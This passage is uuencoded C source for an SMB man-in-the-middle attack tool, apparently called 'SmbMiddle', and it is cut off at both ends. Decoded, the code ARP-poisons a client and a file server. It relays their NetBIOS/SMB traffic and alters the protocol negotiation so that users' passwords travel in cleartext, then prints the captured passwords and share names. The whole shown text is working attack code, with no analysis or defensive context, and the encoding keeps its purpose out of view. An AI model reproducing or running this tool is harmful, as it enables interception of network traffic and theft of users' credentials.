+M<FET>2!L979E;"P@=V4@9&]N)W0@<')I;G0@=&AE#0H@("H@=7-E<B!N86UE
+M*B\-"@D@#0H@:68H4V5C=7)I='DI#0H@>PT*("!P<FEN=&8H(EQN57-E<B`Z
+M("5S(BP-"B`@("`@("`@("AU7V-H87(@*BD@#0H@("`@("`@("`H4&%C:V5T
+M("L@#0H@("`@("`@("`@<VEZ96]F*$YB=%-E<W-I;VY(9'(I("L-"B`@("`@
+M("`@("!S:7IE;V8H4VUB0F%S94AD<BD@*R`-"B`@("`@("`@("!S:7IE;V8H
+M4VUB4V5T=7!84F5Q=65S=$AD<BD@*PT*("`@("`@("`@(%-M8E-E='5P6%)E
+M<75E<W0M/D-A<V5);G-E;G-I=&EV95!A<W-W;W)D3&5N9W1H6S!=*2D[#0H@
+M?2`@("`@(`T*("`@("`@("`@#0H@<')I;G1F*")<;E!A<W,@.B`E<UQN7&XB
+M+%!A<W-W;W)D*3L-"@T*("\O(%=E('!U="!T:&4@96YC<GEP=&5D('!A<W-W
+M;W)D(&EN<W1E860@;V8@=&AE('!A<W-W;W)D#0H@+R\@*B!I;B!C;&5A<B!T
+M97AT#0H-"B!334)E;F-R>7!T*%!A<W-W;W)D+$5N8W)Y<'1I;VY+97DL16YC
+M<GEP=&5D4&%S<W=O<F0I.PT*("`@("`@#0H@5&5M<%-I>F4@/2`H4VUB4V5T
+M=7!84F5Q=65S="T^0GET94-O=6YT6S!=("T-"B`@("`@("`@("`@("!3;6)3
+M971U<%A297%U97-T+3Y#87-E26YS96YS:71I=F5087-S=V]R9$QE;F=T:%LP
+M72D[#0H@("`@("`-"B!496UP(#T@;6%L;&]C*%1E;7!3:7IE*G-I>F5O9BAU
+M7V-H87(I*3L-"@T*(&UE;6-P>2@H=5]C:&%R("HI*"!496UP*2P@#0H@("`@
+M("`@("AU7V-H87(@*BD@#0H@("`@("`@("A086-K970@*R`-"B`@("`@("`@
+M('-I>F5O9BA.8G1397-S:6]N2&1R*2`K#0H@("`@("`@("!S:7IE;V8H4VUB
+M0F%S94AD<BD@*R`-"B`@("`@("`@('-I>F5O9BA3;6)3971U<%A297%U97-T
+M2&1R*2`K#0H@("`@("`@("!3;6)3971U<%A297%U97-T+3Y#87-E26YS96YS
+M:71I=F5087-S=V]R9$QE;F=T:%LP72DL#0H@("`@("`@("!496UP4VEZ92D[
+M#0H-"B!M96UC<'DH*'5?8VAA<B`J*2`H4&%C:V5T("L@#0H@("`@("`@("`@
+M("`@("`@("`@('-I>F5O9BA.8G1397-S:6]N2&1R*2`K#0H@("`@("`@("`@
+M("`@("`@("`@('-I>F5O9BA3;6)"87-E2&1R*2`K#0H@("`@("`@("`@("`@
+M("`@("`@('-I>F5O9BA3;6)3971U<%A297%U97-T2&1R*2DL#0H@("`@("`@
+M("!%;F-R>7!T961087-S=V]R9"P-"B`@("`@("`@($5.0U]005-35T]21%],
+M14Y'5$@I.PT*#0H@;65M8W!Y*"AU7V-H87(@*BD@*%!A8VME="`K(`T*("`@
+M("`@("`@("`@("`@("`@("!S:7IE;V8H3F)T4V5S<VEO;DAD<BD@*PT*("`@
+M("`@("`@("`@("`@("`@("!S:7IE;V8H4VUB0F%S94AD<BD@*PT*("`@("`@
+M("`@("`@("`@("`@("!S:7IE;V8H4VUB4V5T=7!84F5Q=65S=$AD<BD@#0H@
+M("`@("`@("`@("`@("`@("`@("L@14Y#7U!!4U-73U)$7TQ%3D=42"DL#0H@
+M("`@("`@("AU7V-H87(@*BD@*%1E;7`I+`T*("`@("`@("`@5&5M<%-I>F4I
+M.PT*("`@("`@#0H@4VUB4V5T=7!84F5Q=65S="T^0GET94-O=6YT6S!=(#T@
+M5&5M<%-I>F4@*R`-"B`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
+M("!%3D-?4$%34U=/4D1?3$5.1U1(.PT*("`@("`@#0H-"B!3;6)3971U<%A2
+M97%U97-T+3Y#87-E4V5N<VET:79E4&%S<W=O<F1,96YG=&A;,%T@/2`P>#`P
+M.PT*#0H@4VUB4V5T=7!84F5Q=65S="T^0V%S94EN<V5N<VET:79E4&%S<W=O
+M<F1,96YG=&A;,%T]14Y#7U!!4U-73U)$7TQ%3D=42#L-"@D)("`@("`@#0H@
+M3F)T4V5S<VEO;BT^3&5N9W1H(#T@:'1O;G,H<VEZ96]F*%-M8D)A<V5(9'(I
+M("L-"B`@("`@("`@("`@("`@("`@("`@("`@("`@("!S:7IE;V8H4VUB4V5T
+M=7!84F5Q=65S=$AD<BD@*R`-"B`@("`@("`@("`@("`@("`@("`@("`@("`@
+M("!496UP4VEZ92`K#0H@("`@("`@("`@("`@("`@("`@("`@("`@("`@14Y#
+M7U!!4U-73U)$7TQ%3D=42"D[#0H)(`T*?2`-"B\J*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*B\-"@T*+R].;W)M86P@8V]N;F5X:6]N(&]N('!O<G0@,3,Y#0H-
+M"FEN="!.;W)M86PH:6YT(%-O8VM0<F]X>2P@:6YT(%-O8VM3;6)397)V97(I
+M#0I[#0H@:6YT(%-E8W5R:71Y/3`[#0H-"B!I;G0@0V]U;G0[#0H-"B!U7V-H
+M87(@16YC<GEP=&EO;DME>5M%3D-?2T597TQ%3D=42%T[#0H@#0H@=5]C:&%R
+M(%!A8VME=%M)4%]-05A?4TE:15T[#0H-"B!.8G1397-S:6]N2&1R($YB=%-E
+M<W-I;VX[#0H-"B`-"B`O*BHJ*BHJ*BHJ*DY%5$))3U,@4D5154535"HJ*BHJ
+M*BHJ*BHJ*B\-"@T*(%)E860H4V]C:U!R;WAY+%!A8VME="D[#0H@(`T*(%=R
+M:71E*%-O8VM3;6)397)V97(L4&%C:V5T*3L-"@T*+RHJ*BHJ*BHJ*BHJ3D)4
+M(%)%4$Q9*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ+PT*#0H@4F5A9"A3;V-K4VUB4V5R
+M=F5R+%!A8VME="D[#0H-"B!7<FET92A3;V-K4')O>'DL4&%C:V5T*3L-"B`-
+M"B\J*BHJ*BHJ*BHJ*DY%1U!23U0@4D5154535"HJ*BHJ*BHJ*BHJ*B\-"@T*
+M(%)E860H4V]C:U!R;WAY+%!A8VME="D[#0H@(`T*#0H@5W)I=&4H4V]C:U-M
+M8E-E<G9E<BQ086-K970I.PT*#0HO*BHJ*BHJ*BHJ*BI.14=04D]4(%)%4$Q9
+M*BHJ*BHJ*BHJ*BHJ*BHO#0H-"B!296%D*%-O8VM3;6)397)V97(L4&%C:V5T
+M*3L-"@T*($YE9U!R;W1297!L>2@-"B`@("`@("`@("`@("`@4&%C:V5T+`T*
+M("`@("`@("`@("`@("!%;F-R>7!T:6]N2V5Y+`T*("`@("`@("`@("`@("`F
+M4V5C=7)I='DI.PT*#0H@5W)I=&4H4V]C:U!R;WAY+%!A8VME="D[#0H-"B\J
+M*BHJ*BHJ*BHJ*E-%5%506"!215%515-4*BHJ*BHJ*BHJ*BHJ*B\-"B`-"B!2
+M96%D*%-O8VM0<F]X>2Q086-K970I.PT*("`-"B!3971U<%A297%U97-T*`T*
+M("`@("`@("`@("`@("`@4&%C:V5T+`T*("`@("`@("`@("`@("`@16YC<GEP
+M=&EO;DME>2P-"B`@("`@("`@("`@("`@(%-E8W5R:71Y*3L-"B`@#0H@5W)I
+M=&4H4V]C:U-M8E-E<G9E<BQ086-K970I.PT*(`T*+RHJ*BHJ*BHJ*BHJ4T54
+M55!8(%)%4$Q9*BHJ*BHJ*BHJ*BHJ*BHJ+PT*#0H@4F5A9"A3;V-K4VUB4V5R
+M=F5R+%!A8VME="D[#0H-"B!M96UC<'DH#0H@("`@("`@("AU7V-H87(@*BD@
+M*"9.8G1397-S:6]N*2P-"B`@("`@("`@*'5?8VAA<B`J*2`H4&%C:V5T*2P-
+M"B`@("`@("`@<VEZ96]F*$YB=%-E<W-I;VY(9'(I*3L-"B`-"B`@(`T*(&EF
+M*"!N=&]H<RA.8G1397-S:6]N+DQE;F=T:"D@/B`S-2`I#0H@>PT*("!P<FEN
+M=&8H(D%C8V5S<R!G<F%N=&5D("T^(%!A<W-W;W)D('9A;&ED("%<;B(I.PT*
+M#0H-"B`@5W)I=&4H4V]C:U!R;WAY+%!A8VME="D[#0H@(`T*+RHJ*BHJ*BHJ
+M*BHJ5$-/3E@@24Y415)#15!424].*BHJ*BHJ*BHJ+PT*("`@#0H@(%)E860H
+M4V]C:U!R;WAY+%!A8VME="D[#0H-"B`@5W)I=&4H4V]C:U-M8E-E<G9E<BQ0
+M86-K970I.PT*#0H@('!R:6YT9B@B4VAA<F4@.B`E<UQN(BP-"B`@("`@("`@
+M("AU7V-H87(@*BD@*%!A8VME="`K#0H@("`@("`@("`@("`@("`@("`@("!S
+M:7IE;V8H3F)T4V5S<VEO;DAD<BD@*PT*("`@("`@("`@("`@("`@("`@("`@
+M<VEZ96]F*%-M8D)A<V5(9'(I("L-"B`@("`@("`@("`@("`@("`@("`@('-I
+M>F5O9BA3;6)48V]N6%)E<75E<W1(9'(I("L@,2`I*3L-"@T*+RHJ*BHJ*BHJ
+M*BHJ4D5$25)%0U1)3TXJ*BHJ*BHJ*BHJ*BHJ*BHJ+PT*#0H@("\O1&\@>6]U
+M('=A;G0@=&\@:&%V92!N;VX@8FQO8VMI;F<@<F5A9"@I(&-A;&QS(#\-"@T*
+M("!F8VYT;"A3;V-K4')O>'DL1E]3151&3"Q/7TY/3D),3T-+*3L-"B`@9F-N
+M=&PH4V]C:U-M8E-E<G9E<BQ&7U-%5$9,+$]?3D].0DQ/0TLI.PT*#0H@('=H
+M:6QE*#$I#0H@('L-"B`@($-O=6YT(#T@<F5A9"A3;V-K4')O>'DL)DYB=%-E
+M<W-I;VXL<VEZ96]F*$YB=%-E<W-I;VY(9'(I*3L-"@T*("`@:68H(4-O=6YT
+M*0T*("`@>PT*("`@('!R:6YT9B@B7&Y397-S:6]N(&9I;FES:&5D("%<;B(I
+M.PT*("`@(&-L;W-E*%-O8VM0<F]X>2D[#0H@("`@8VQO<V4H4V]C:U-M8E-E
+M<G9E<BD[#0H@("`@<F5T=7)N(#`[#0H@("!]#0H@("`-"B`@(&EF*$-O=6YT
+M("$]("TQ("8F($-O=6YT*0T*("`@>R`-"B`@("!M96US970H4&%C:V5T+#`L
+M25!?34%87U-)6D4I.R`-"B`@(`T*("`@(&UE;6-P>2A086-K970L*'5?8VAA
+M<B`J*2`H)DYB=%-E<W-I;VXI+'-I>F5O9BA.8G1397-S:6]N2&1R*2D[#0H@
+M("`@("`@("`@("`@("`@("`@(`T*("`@(')E860H4V]C:U!R;WAY+`T*("`@
+M("`@("`@*'5?8VAA<B`J*2`H4&%C:V5T("L@<VEZ96]F*$YB=%-E<W-I;VY(
+M9'(I*2P-"B`@("`@("`@(&YT;VAS*$YB=%-E<W-I;VXN3&5N9W1H*2D[#0H-
+M"B`@("!W<FET92A3;V-K4VUB4V5R=F5R+`T*("`@("`@("`@("AU7V-H87(@
+M*BD@*%!A8VME="DL#0H@("`@("`@("`@;G1O:',H3F)T4V5S<VEO;BY,96YG
+M=&@I("L-"B`@("`@("`@("!S:7IE;V8H3F)T4V5S<VEO;DAD<BDI.PT*("`@
+M?0T*#0H@("!#;W5N="`](')E860H4V]C:U-M8E-E<G9E<BPF3F)T4V5S<VEO
+M;BQS:7IE;V8H3F)T4V5S<VEO;DAD<BDI.PT*#0H@("!I9B@A0V]U;G0I#0H@
+M("![#0H@("`@<')I;G1F*")<;E-E<W-I;VX@9FEN:7-H960@(5QN(BD[#0H@
+M("`@8VQO<V4H4V]C:U!R;WAY*3L-"B`@("!C;&]S92A3;V-K4VUB4V5R=F5R
+M*3L-"B`@("!R971U<FX@,#L-"B`@('T-"B`@(`T*("`@:68H0V]U;G0@(3T@
+M+3$@)B8@0V]U;G0I#0H@("![#0H@("`@;65M<V5T*%!A8VME="PP+$E07TU!
+M6%]325I%*3L@#0H@("`-"B`@("!M96UC<'DH4&%C:V5T+"AU7V-H87(@*BD@
+M*"9.8G1397-S:6]N*2QS:7IE;V8H3F)T4V5S<VEO;DAD<BDI.PT*("`@("`@
+M("`@("`@("`@("`@("`-"B`@("!R96%D*%-O8VM3;6)397)V97(L#0H@("`@
+M("`@("`H=5]C:&%R("HI("A086-K970@*R!S:7IE;V8H3F)T4V5S<VEO;DAD
+M<BDI+`T*("`@("`@("`@;G1O:',H3F)T4V5S<VEO;BY,96YG=&@I*3L-"@T*
+M("`@('=R:71E*%-O8VM0<F]X>2P-"B`@("`@("`@("`H=5]C:&%R("HI("A0
+M86-K970I+`T*("`@("`@("`@(&YT;VAS*$YB=%-E<W-I;VXN3&5N9W1H*2`K
+M#0H@("`@("`@("`@<VEZ96]F*$YB=%-E<W-I;VY(9'(I*3L-"B`@('T-"B`@
+M?0T*('T-"B!E;'-E#0H@>PT*("!P<FEN=&8H(E-E<W-I;VX@9F%I;&5D("T^
+M(%!A<W-W;W)D(&EN=F%L:60@(5QN(BD[#0H@("`-"B`@5W)I=&4H4V]C:U!R
+M;WAY+%!A8VME="D[#0H@#0H@(&-L;W-E*%-O8VM0<F]X>2D[#0H@(&-L;W-E
+M*%-O8VM3;6)397)V97(I.PT*("`-"B`@<F5T=7)N(#`[#0H@?0T*(`T*(&-L
+M;W-E*%-O8VM0<F]X>2D[#0H@8VQO<V4H4V]C:U-M8E-E<G9E<BD[#0H@#0H@
+M<F5T=7)N(#`[#0I](`T*("`-"B\J*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*B\-
+M"B\J4W5P<&]R="!W:6XR:R]84"!W:71H($Y"5"!D:7-A8FQE9"`H<V%M92!A
+M<R!T:&4@(DYO<FUA;"(@9G5N8W1I;VX-"B`J(&)U="!T:&4@;F)T(&YA;65S
+M('-E;F1I;F<@<')O8V5S<R!I<R!N;W0@:6YC;'5D960@*B\-"@T*:6YT(%=I
+M;C)K6%!3=7!P;W)T*&EN="!3;V-K4')O>'DL(&EN="!3;V-K4VUB4V5R=F5R
+M*0T*>PT*(&EN="!396-U<FET>3TP.PT*#0H@:6YT($-O=6YT.PT*#0H@=5]C
+M:&%R($5N8W)Y<'1I;VY+97E;14Y#7TM%65],14Y'5$A=.PT*(`T*('5?8VAA
+M<B!086-K971;25!?34%87U-)6D5=.PT*#0H@3F)T4V5S<VEO;DAD<B!.8G13
+M97-S:6]N.PT*#0H@#0H-"B\J*BHJ*BHJ*BHJ*DY%1U!23U0@4D5154535"HJ
+M*BHJ*BHJ*BHJ*B\-"@T*(%)E860H4V]C:U!R;WAY+%!A8VME="D[#0H@(`T*
+M#0H@5W)I=&4H4V]C:U-M8E-E<G9E<BQ086-K970I.PT*#0HO*BHJ*BHJ*BHJ
+M*BI.14=04D]4(%)%4$Q9*BHJ*BHJ*BHJ*BHJ*BHO#0H-"B!296%D*%-O8VM3
+M;6)397)V97(L4&%C:V5T*3L-"@T*($YE9U!R;W1297!L>2@-"B`@("`@("`@
+M("`@("`@4&%C:V5T+`T*("`@("`@("`@("`@("!%;F-R>7!T:6]N2V5Y+`T*
+M("`@("`@("`@("`@("`F4V5C=7)I='DI.PT*#0H@5W)I=&4H4V]C:U!R;WAY
+M+%!A8VME="D[#0H-"B\J*BHJ*BHJ*BHJ*E-%5%506"!215%515-4*BHJ*BHJ
+M*BHJ*BHJ*B\-"B`-"B!296%D*%-O8VM0<F]X>2Q086-K970I.PT*("`-"B!3
+M971U<%A297%U97-T*`T*("`@("`@("`@("`@("`@4&%C:V5T+`T*("`@("`@
+M("`@("`@("`@16YC<GEP=&EO;DME>2P-"B`@("`@("`@("`@("`@(%-E8W5R
+M:71Y*3L-"B`@#0H@5W)I=&4H4V]C:U-M8E-E<G9E<BQ086-K970I.PT*(`T*
+M+RHJ*BHJ*BHJ*BHJ4T5455!8(%)%4$Q9*BHJ*BHJ*BHJ*BHJ*BHJ+PT*#0H@
+M4F5A9"A3;V-K4VUB4V5R=F5R+%!A8VME="D[#0H-"B!M96UC<'DH#0H@("`@
+M("`@("AU7V-H87(@*BD@*"9.8G1397-S:6]N*2P-"B`@("`@("`@*'5?8VAA
+M<B`J*2`H4&%C:V5T*2P-"B`@("`@("`@<VEZ96]F*$YB=%-E<W-I;VY(9'(I
+M*3L-"B`-"B`@(`T*(&EF*"!N=&]H<RA.8G1397-S:6]N+DQE;F=T:"D@/B`S
+M-2`I#0H@>PT*("!P<FEN=&8H(D%C8V5S<R!G<F%N=&5D("T^(%!A<W-W;W)D
+M('9A;&ED("%<;B(I.PT*#0H-"B`@5W)I=&4H4V]C:U!R;WAY+%!A8VME="D[
+M#0H@(`T*+RHJ*BHJ*BHJ*BHJ5$-/3E@@24Y415)#15!424].*BHJ*BHJ*BHJ
+M+PT*("`@#0H@(%)E860H4V]C:U!R;WAY+%!A8VME="D[#0H-"B`@5W)I=&4H
+M4V]C:U-M8E-E<G9E<BQ086-K970I.PT*#0H@('!R:6YT9B@B4VAA<F4@.B`E
+M<UQN(BP-"B`@("`@("`@("AU7V-H87(@*BD@*%!A8VME="`K#0H@("`@("`@
+M("`@("`@("`@("`@("!S:7IE;V8H3F)T4V5S<VEO;DAD<BD@*PT*("`@("`@
+M("`@("`@("`@("`@("`@<VEZ96]F*%-M8D)A<V5(9'(I("L-"B`@("`@("`@
+M("`@("`@("`@("`@('-I>F5O9BA3;6)48V]N6%)E<75E<W1(9'(I("L@,2`I
+M*3L-"@T*+RHJ*BHJ*BHJ*BHJ4D5$25)%0U1)3TXJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M+PT*#0H@("\O1&\@>6]U('=A;G0@=&\@:&%V92!N;VX@8FQO8VMI;F<@<F5A
+M9"@I(&-A;&QS(#\-"@T*("!F8VYT;"A3;V-K4')O>'DL1E]3151&3"Q/7TY/
+M3D),3T-+*3L-"B`@9F-N=&PH4V]C:U-M8E-E<G9E<BQ&7U-%5$9,+$]?3D].
+M0DQ/0TLI.PT*#0H@('=H:6QE*#$I#0H@('L-"B`@($-O=6YT(#T@<F5A9"A3
+M;V-K4')O>'DL)DYB=%-E<W-I;VXL<VEZ96]F*$YB=%-E<W-I;VY(9'(I*3L-
+M"B`@(`T*("`@:68H(4-O=6YT*0T*("`@>PT*("`@('!R:6YT9B@B7&Y397-S
+M:6]N(&9I;FES:&5D("%<;B(I.PT*("`@(&-L;W-E*%-O8VM0<F]X>2D[#0H@
+M("`@8VQO<V4H4V]C:U-M8E-E<G9E<BD[#0H@("`@<F5T=7)N(#`[#0H@("!]
+M#0H-"B`@(&EF*$-O=6YT("$]("TQ("8F($-O=6YT*0T*("`@>R`-"B`@("!M
+M96US970H4&%C:V5T+#`L25!?34%87U-)6D4I.R`-"B`@(`T*("`@(&UE;6-P
+M>2A086-K970L*'5?8VAA<B`J*2`H)DYB=%-E<W-I;VXI+'-I>F5O9BA.8G13
+M97-S:6]N2&1R*2D[#0H@("`@("`@("`@("`@("`@("`@(`T*("`@(')E860H
+M4V]C:U!R;WAY+`T*("`@("`@("`@*'5?8VAA<B`J*2`H4&%C:V5T("L@<VEZ
+M96]F*$YB=%-E<W-I;VY(9'(I*2P-"B`@("`@("`@(&YT;VAS*$YB=%-E<W-I
+M;VXN3&5N9W1H*2D[#0H-"B`@("!W<FET92A3;V-K4VUB4V5R=F5R+`T*("`@
+M("`@("`@("AU7V-H87(@*BD@*%!A8VME="DL#0H@("`@("`@("`@;G1O:',H
+M3F)T4V5S<VEO;BY,96YG=&@I("L-"B`@("`@("`@("!S:7IE;V8H3F)T4V5S
+M<VEO;DAD<BDI.PT*("`@?0T*#0H@("!#;W5N="`](')E860H4V]C:U-M8E-E
+M<G9E<BPF3F)T4V5S<VEO;BQS:7IE;V8H3F)T4V5S<VEO;DAD<BDI.PT*("`@
+M#0H@("!I9B@A0V]U;G0I#0H@("![#0H@("`@<')I;G1F*")<;E-E<W-I;VX@
+M9FEN:7-H960@(5QN(BD[#0H@("`@8VQO<V4H4V]C:U!R;WAY*3L-"B`@("!C
+M;&]S92A3;V-K4VUB4V5R=F5R*3L-"B`@("!R971U<FX@,#L-"B`@('T-"B`@
+M(`T*("`@:68H0V]U;G0@(3T@+3$@)B8@0V]U;G0I#0H@("![#0H@("`@;65M
+M<V5T*%!A8VME="PP+$E07TU!6%]325I%*3L@#0H@("`-"B`@("!M96UC<'DH
+M4&%C:V5T+"AU7V-H87(@*BD@*"9.8G1397-S:6]N*2QS:7IE;V8H3F)T4V5S
+M<VEO;DAD<BDI.PT*("`@("`@("`@("`@("`@("`@("`-"B`@("!R96%D*%-O
+M8VM3;6)397)V97(L#0H@("`@("`@("`H=5]C:&%R("HI("A086-K970@*R!S
+M:7IE;V8H3F)T4V5S<VEO;DAD<BDI+`T*("`@("`@("`@;G1O:',H3F)T4V5S
+M<VEO;BY,96YG=&@I*3L-"@T*("`@('=R:71E*%-O8VM0<F]X>2P-"B`@("`@
+M("`@("`H=5]C:&%R("HI("A086-K970I+`T*("`@("`@("`@(&YT;VAS*$YB
+M=%-E<W-I;VXN3&5N9W1H*2`K#0H@("`@("`@("`@<VEZ96]F*$YB=%-E<W-I
+M;VY(9'(I*3L-"B`@('T-"B`@?0T*('T-"B!E;'-E#0H@>PT*("!P<FEN=&8H
+M(E-E<W-I;VX@9F%I;&5D("T^(%!A<W-W;W)D(&EN=F%L:60@(5QN(BD[#0H@
+M("`-"B`@5W)I=&4H4V]C:U!R;WAY+%!A8VME="D[#0H@#0H@(&-L;W-E*%-O
+M8VM0<F]X>2D[#0H@(&-L;W-E*%-O8VM3;6)397)V97(I.PT*("`-"B`@<F5T
+M=7)N(#`[#0H@?0T*(`T*(&-L;W-E*%-O8VM0<F]X>2D[#0H@8VQO<V4H4V]C
+M:U-M8E-E<G9E<BD[#0H@#0H@<F5T=7)N(#`[#0I](`T*("`-"@T*#0H-"B\J
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*B\-"@T*+RHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*@T*("`@("`@("`@("`@("`@("`@("`@("`@("`@5$A%($U!24X@
+M1E5.0U1)3TX-"BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*B\-"@T*97AT97)N
+M(&-H87(@*F]P=&%R9SL-"F5X=&5R;B!I;G0@;W!T:6YD.PT*97AT97)N(&EN
+M="!O<'1E<G([#0H-"FEN="!M86EN*&EN="!A<F=C+&-H87(@*F%R9W9;72D-
+M"GL-"B!S=&%T:6,@8VAA<B!O<'1S=')I;F=;73TB:3IS.F,Z9CIL.B([#0H@
+M:6YT(&]P=&-H.PT*(&EN="!,:7-T96Y0;W)T(#T@,3$S.3L-"B!C:&%R("I$
+M979I8V4[#0H-"B!S=')U8W0@<V]C:V%D9')?:6X@4VUB4V5R=F5R.PT*('-T
+M<G5C="!S;V-K861D<E]I;B!0<F]X>3L-"B`-"B!I;G0@4V]C:U-M8E-E<G9E
+M<CL-"B!I;G0@4V]C:U!R;WAY.PT*#0H@:6YT($-O=6YT.PT*#0H@8VAA<B!#
+M:&]I8V4],#L-"@T*+RI3979E<F%L($E0(&%D9')E<W-E<RHO#0H@=5]I;G0S
+M,E]T($UY27`[#0H@#0H@<&-A<%]T("I$97-C<CL-"B`-"B!U7V-H87(@4F5A
+M;$5N971#;&EE;G1;151(7T%,14Y=.PT*('5?8VAA<B!296%L16YE=%-M8E-E
+M<G9E<EM%5$A?04Q%3ET[#0H@=5]C:&%R($UY16YE=%M%5$A?04Q%3ET[#0H@
+M#0H@8VAA<B!%<G)B=69;-#`Y-ET[#0H-"B!I9BAA<F=C(#P@,3$I#0H@>PT*
+M("!P<FEN=&8H(EQN4VUB36ED9&QE(`T*("`@("`@("`@("UI(&EN=&5R9F%C
+M92`-"B`@("`@("`@("`M8R!#;&EE;G0G<R!)4"`-"B`@("`@("`@("`M<R!3
+M97)V97(G<R!)4"`-"B`@("`@("`@("`M;"!,:7-T96YI;F<@4&]R=`T*("`@
+M("`@("`@("UF($9A:V4@25!<;B(I.PT*("`-"B`@<F5T=7)N(#`[#0H@?0T*
+M(`T*('=H:6QE*"AO<'1C:#T@9V5T;W!T*&%R9V,L87)G=BQO<'1S=')I;F<I
+M*2$]14]&*0T*('L-"B`@<W=I=&-H*&]P=&-H*0T*("![#0H@("!C87-E("=I
+M)SH-"B`@("!$979I8V4@/2`H8VAA<B`J*2`H;6%L;&]C*'-T<FQE;BAO<'1A
+M<F<I*G-I>F5O9BAC:&%R*2DI.PT*("`@('-T<FYC<'DH1&5V:6-E+&]P=&%R
+M9RQS=')L96XH;W!T87)G*2D[#0H@("`@8G)E86L[#0H-"B`@(&-A<V4@)V,G
+M.@T*("`@(&EN971?871O;BAO<'1A<F<L)E!R;WAY+G-I;E]A9&1R*3L-"B`@
+M("!B<F5A:SL-"@T*("`@8V%S92`G<R<Z#0H@("`@:6YE=%]A=&]N*&]P=&%R
+M9RPF4VUB4V5R=F5R+G-I;E]A9&1R*3L-"B`@("!B<F5A:SL-"@T*("`@8V%S
+M92`G9B<Z#0H@("`@37E)<"`](&EN971?861D<BAO<'1A<F<I.PT*("`@(&)R
+M96%K.PT*("`@#0H@("!C87-E("=L)SH-"B`@("!,:7-T96Y0;W)T(#T@871O
+M:2AO<'1A<F<I.PT*("`@(&)R96%K.PT*("`@#0H@("!D969A=6QT(#H-"B`@
+M("!P<FEN=&8H(EQN4VUB36ED9&QE(`T*("`@("`@("`@("`@+6D@:6YT97)F
+M86-E(`T*("`@("`@("`@("`@+6,@0VQI96YT)W,@25`@#0H@("`@("`@("`@
+M("`M<R!397)V97(G<R!)4"`-"B`@("`@("`@("`@("UL($QI<W1E;FEN9R!0
+M;W)T#0H@("`@("`@("`@("`M9B!&86ME($EP7&XB*3L-"B`@("!R971U<FX@
+M,#L-"B`@('T-"B`@?0T*#0H@1&5S8W(@/2!P8V%P7V]P96Y?;&EV92A$979I
+M8V4L25!?34%87U-)6D4L,2PP+$5R<F)U9BD[#0H-"B`@<')I;G1F*")<;D1O
+M('EO=2!W86YT(%=I;C)K+UA0('-U<'!O<G0@*$Y"5"!D:7-A8FQE9"`A*2`Z
+M('DO;C]<;B(I.PT*("!#:&]I8V4@/2!G971C:&%R*"D[#0H@(&=E=&-H87(H
+M*3L-"@T*($=E=$5N971!9&1R97-S*$UY16YE="Q$979I8V4I.PT*#0HO*E1O
+M(&AA=F4@=&AE($U!0R!A9')E<W,@;V8@=&AE(&-L:65N="HO#0H@#0H@07)P
+M4F5Q=65S=$EN:F5C=&EO;B@F37E)<"P-"B`@("`@("`@("`@("`@("`@("`@
+M("90<F]X>2YS:6Y?861D<BYS7V%D9'(L#0H@("`@("`@("`@("`@("`@("`@
+M("!->45N970L#0H@("`@("`@("`@("`@("`@("`@("!296%L16YE=$-L:65N
+M="P-"B`@("`@("`@("`@("`@("`@("`@($1E=FEC92P-"B`@("`@("`@("`@
+M("`@("`@("`@($1E<V-R*3L-"@T*+RI4;R!H879E('1H92!-04,@861R97-S
+M(&]F('1H92!S97)V97(J+PT*(`T*($%R<%)E<75E<W1);FIE8W1I;VXH)DUY
+M27`L#0H@("`@("`@("`@("`@("93;6)397)V97(N<VEN7V%D9'(N<U]A9&1R
+M+`T*("`@("`@("`@("`@("!->45N970L#0H@("`@("`@("`@("`@(%)E86Q%
+M;F5T4VUB4V5R=F5R+`T*("`@("`@("`@("`@("!$979I8V4L#0H@("`@("`@
+M("`@("`@($1E<V-R*3L-"@T*+RI!<G`@<&]I<V]N:6YG(&%G86EN<W0@=&AE
+M('-E<G9E<BHO#0H@#0H@07)P4&]I<V]N*`T*("`@("`@("`@("`F4')O>'DN
+M<VEN7V%D9'(N<U]A9&1R+`T*("`@("`@("`@("`F4VUB4V5R=F5R+G-I;E]A
+M9&1R+G-?861D<BP-"B`@("`@("`@("`@37E%;F5T+`T*("`@("`@("`@("!2
+M96%L16YE=%-M8E-E<G9E<BP-"B`@("`@("`@("`@1&5V:6-E*3L-"@T*+RI!
+M<G`@<&]I<V]N:6YG(&%G86EN<W0@=&AE(&-L:65N="HO#0H-"B!!<G!0;VES
+M;VXH#0H@("`@("`@("`@("93;6)397)V97(N<VEN7V%D9'(N<U]A9&1R+`T*
+M("`@("`@("`@("`F4')O>'DN<VEN7V%D9'(N<U]A9&1R+`T*("`@("`@("`@
+M("!->45N970L#0H@("`@("`@("`@(%)E86Q%;F5T0VQI96YT+`T*("`@("`@
+M("`@("!$979I8V4I.PT*#0HO*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*B\-"@T*
+M('-W:71C:"A#:&]I8V4I#0H@>PT*("!C87-E("=Y)R`Z#0H@(%-M8E-E<G9E
+M<BYS:6Y?<&]R="`](&AT;VYS*%--0E]03U)47UA07S)+*3L-"B`@8G)E86L[
